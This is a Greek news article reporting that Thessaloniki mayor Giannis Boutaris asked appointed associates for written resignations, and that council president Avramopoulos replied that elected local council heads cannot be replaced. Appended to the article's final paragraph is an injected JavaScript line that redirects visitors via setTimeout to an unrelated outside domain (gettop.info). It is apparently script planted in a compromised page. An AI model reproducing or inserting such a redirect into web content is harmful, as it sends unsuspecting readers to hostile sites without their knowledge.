Ο Μπουτάρης ζητεί τα «κεφάλια» των συνεργατών του

0
3

 

Στη συνεδρίαση της εκτελεστικής επιτροπής του δήμου Θεσσαλονίκης, ο Γιάννης Μπουτάρης ζήτησε τις παραιτήσεις όλων των διορισμένων σε θέσεις αιρετών συνεργατών του, εγγράφως.

Ο δήμαρχος μίλησε για διαδικαστικό θέμα, προσθέτοντας ότι δεν θα κάνει μεγάλες αλλαγές.

Σύμφωνα με το thestival αναφέρεται ότι οι διορισμένοι σύμβουλοι δεν εξέφρασαν αντίρρηση και εντός των επόμενων ημερών ο κ. Μπουτάρης θα έχει στο γραφείο του τις παραιτήσεις που ζήτησε.

«Ζητώ τις παραιτήσεις επειδή ο Τύπος γράφει διάφορα και λέει ότι θα κάνω ανασχηματισμό. Δώστε τις παραιτήσεις για να υπάρχουν στο γραφείο μου και όταν έρθει η στιγμή θα γίνουν οι απαραίτητες αλλαγές. Μη νομίζετε ότι θα κάνω κάτι τρομερό σε αλλαγές», τους είπε ο δήμαρχος Θεσσαλονίκης.

Ο πρόεδρος του Δημοτικού Συμβουλίου, Παναγιώτης Αβραμόπουλος, παρενέβη, τονίζοντας ότι οι πρόεδροι των Τοπικών Συμβουλίων είναι εκλεγμένοι από το λαό και δεν μπορούν να αντικατασταθούν με πρόσωπο της αρεσκείας του Δημάρχου άρα δεν θα έχει νόημα η παραίτησή τους.

Πρόσθεσε όμως ότι σε περίπτωση που τίθεται θέμα εμπιστοσύνης του δημάρχου προς το πρόσωπό του ο ίδιος θα θέσει άμεσα την παραίτησή του. Ο κ. Μπουτάρης δήλωσε ότι τον εμπιστεύεται και έτσι έκλεισε το θέμα. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here